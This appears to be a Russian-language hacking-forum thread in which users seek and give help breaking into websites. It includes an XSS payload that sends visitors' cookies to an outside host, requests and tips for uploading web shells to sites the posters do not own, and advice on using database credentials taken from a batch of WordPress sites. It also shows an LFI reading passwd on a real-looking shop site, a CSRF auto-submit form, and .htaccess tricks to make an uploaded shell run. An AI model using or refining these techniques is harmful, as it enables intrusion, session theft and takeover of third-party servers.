Как проверить сразу несколько URL на редирект? Подскажите плиз шаровые или трайал сервисы, чтобы проверить сразу 63 линка на редирект? Нижеуказанный умеет расшифровывать Ютубовские скриптовые коды вида youtube.com/channel/UCAXxzBq3dfQ+V3FN501aMlw, а большинство бесплатных - нет Sad Если надо проверить редирект отдельных страниц: на сайте сервисов http://try.seoimage.com/check-server-header-check-redirects-tool/ - можно попробовать, но взломать форму я не смог
либо голова не варит либо туплю , есть активка вставляю скрипт, не выполняеться, а в исходнике вижу что мешают символы "><script>img = new Image(); img.src = \"http://site.ru4_1.gif?\"+document.cookie;</script> как их закодировать? пробовал base не катит
Здравствуйте уважаемые... есть доступ на ipb 3.4.6 и DLE 10 лицензионный версия, вопрос как залить шелл? в гуглах не нашел нечего подобного. Попробовал как написано здесь, 1ый, 2ой варианты не помогла. второй способ тоже не получается. Помогите залить шелл. просто не хочу рискнуть и потерять оба сайта ))) заранее спасибо за ответь !!!
Нашел уязвимость. Вытащил из пачки сайтов примерно вот такие данные: <?php// ** MySQL settings - You can get this info from your web host ** //define('DB_NAME', '*******');define('DB_USER', '*******');define('DB_PASSWORD', '*******');define('DB_HOST', 'localhost');define('DB_CHARSET', 'utf8');define('DB_COLLATE', '');define('AUTH_KEY', '*******');define('SECURE_AUTH_KEY','*******');define('LOGGED_IN_KEY','*******');define('NONCE_KEY','*******q');define('AUTH_SALT','*******');define('SECURE_AUTH_SALT', '*******');define('LOGGED_IN_SALT', '*******');define('NONCE_SALT', '*******');$table_prefix= 'wp_';define ('WPLANG', 'el');define('WP_DEBUG', false);if ( !defined('ABSPATH') )define('ABSPATH', dirname(__FILE__) . '/');require_once(ABSPATH . 'wp-settings.php'); Как залить шелл на сервак?
везде Localhost ? только пробовать приконнектиться к бд, через вытащенные данные. попробуй найти сперва phpmyadmin или админер на этих серверах. Если нет, то пробуй подключиться к ним внешне
Ну попробуй зайти в myadmin сделай юзера, залей шелл и вауля. Если myadmin нету, то попробуй через внешнее подключение приконнектится, хотя маловероятно, но пытка не пытка)
Доброго дня! Есть уязвимость LFI в Magento plugin Magmi. http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility файл mage читается. http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility файл passwd читается. http://www.site.co.uk/shop/magmi/we...intype=utilities&pluginclass=CustomSQLUtility а вот так с расширением php либо любым другим не читается. Как прочесть?
ситуация такая есть csfr <form method='post' action='/anketa.php?'> <div class="end">Личные данные:</div> Имя:<br /> <input type='text' name='ank_name' value='shramDCMSHELP' maxlength='32' /><br /> Фамилия:<br /> <input type='text' name='familiya' value='1' maxlength='64' /><br /> Дата рождения:<br /> <input type='text' name='ank_d_r' value='1' size='2' maxlength='2' /> <input type='text' name='ank_m_r' value='1' size='2' maxlength='2' /> <input type='text' name='ank_g_r' value='1' size='4' maxlength='4' /><br /> <input type='submit' name='save' value='Сохранить' /> </form> и как здесь включить <html><body onload="document.forms['NAME'].submit();"> если нету name в post запросе у меня в html коде
Такой вопрос. Получается залить шелл, но при заходе на него site/shell.php он не открывается, а скачивается на комп. Почему так и как это победить?
.htaccess так настроен, попробуйте поиграть с расширениями шелла (php3,php4,php5,phtml) или попробуйте перелить штаку в директорию с шеллом.
php3 4 5 - не загружает, phtml грузит, но не исполняет, а загружает. htaccess загружается, но не помогает с таким содержимым htaccess AddType application/x-httpd-php .bit AddHandler application/x-httpd-php .bit